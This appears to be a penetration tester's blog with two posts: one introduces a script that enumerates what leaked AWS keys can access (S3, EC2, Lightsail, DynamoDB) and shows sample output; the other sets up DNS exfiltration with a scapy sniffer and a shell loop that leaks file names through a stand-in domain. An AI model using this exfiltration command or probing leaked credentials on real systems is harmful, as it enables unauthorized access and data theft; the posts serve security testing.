Thursday, February 23, 2017

Enumerate Leaked AWS API Key Access

Sometimes on a pentest engagement (or from https://gitleaks.com) you'll come across some AWS API keys. If you want to know what those keys have access to, I've decided to make a script that runs through various AWS services API endpoints to list access to them. You can do this using the awscli tool but I find it less than ideal to deal with and the JSON you have to parse can be annoying.

So I decided to write a tool since I couldn't find one online. This tool is pretty simple, it simply takes in an access key and secret key often used in configurations and connect scripts. It then goes one by one to each service and queries useful information such as Dynamo DB table names, S3 bucket names and how many objects are in each one.

So for example, let's say during your recon/OSINT phase you discover some AWS API creds exposed on gitleaks or some config file. (The screenshot obviously isn't a client, just a random entry in gitleaks)

You take the "Access Key" and "Secret Key" and pump them into the AWSEnumerator script:
$ ./AWSEnumerator.py AKXXXXXXXXXXXXXXXXXA ENtXXXXXXXXXXXXXXXXXq
Checking for S3 buckets
  Total # of buckets: 9
    Bucket: bucket1 [8 objects]
    Bucket: bucket2 [1000 objects]
    Bucket: bucket3-dev [1000 objects]
    Bucket: bucket4 [1 objects]
    Bucket: bucket5 [747 objects]
    Bucket: otherbucket [1000 objects]
    Bucket: morebucket [54 objects]
    Bucket: whereismahbucket [26 objects]
    Bucket: ilikefish [95 objects]
Checking for EC2 Instances
  Total # of EC2 Instances: 2
    Instance: t2.nano - 52.570.576.548 - running
    Instance: t2.small - stopped
Checking for Lightsail Instances
  Total # of Lightsail instances: 1
    Name: enumtest1, Username: ubuntu, IP: 254.244.198.296, State: running
Checking for DynamoDB Tables
  Total # of DynamoDB Tables: 2
    Table Name: tabletest
    Table Name: test2
This information is fantastic for both reporting purposes as well as possibly escalating access or obtaining sensitive information.

Currently, the script supports:
  - EC2 Instances (type, IP, status)
  - S3 Buckets (name, number of objects)
  - Lightsail Instances (name, username, IP, state)
  - DynamoDB (table name)

I am planning on adding support for additional services as time goes on.

The tool can be found at https://github.com/atucom/AWSEnumerator

Friday, February 3, 2017

Super Simple DNS Exfiltration

I needed to test if I got command execution on a target box. Pretty much every outbound port was blocked. Luckily, it's extremely rare for people to turn off outbound UDP port 53 so DNS queries can still make it through.

In order for you to get a basic DNS exfil setup to work you'll need a couple things:
  1. A VPS to sniff the DNS queries
  2. A domain to direct the DNS queries to
The first step is to configure an NS record for a subdomain of your main domain. I simply created an NS record for e.domain.tld (replace domain.tld with your domain) and pointed it to the IP address of VPS.

Now when someone requests somedata.e.domain.tld the UDP request packet will go to the VPS IP. Run tshark/tcpdump to grab the request and prove if you have command execution or not.

I partially wrote the following python script to just parse out the domain name being requested.

#!/usr/bin/env python2

from scapy.all import *
from scapy.layers.dns import DNSRR, DNS, DNSQR

def handlepkt(p):
  #thanks stackoverflow!
  if p.haslayer(DNS):
      if p.qdcount > 0 and isinstance(p.qd, DNSQR):
          name = p.qd.qname
      elif p.ancount > 0 and isinstance(p.an, DNSRR):
          name = p.an.rdata
      print name

sniff(iface=eth0, filter="udp and port 53", store=0,  prn=handlepkt)

Since your DNS settings are configured properly, just start the python sniffer and run something like

for i in *; do host $i.e.domain.tld; done

And watch the requests come in.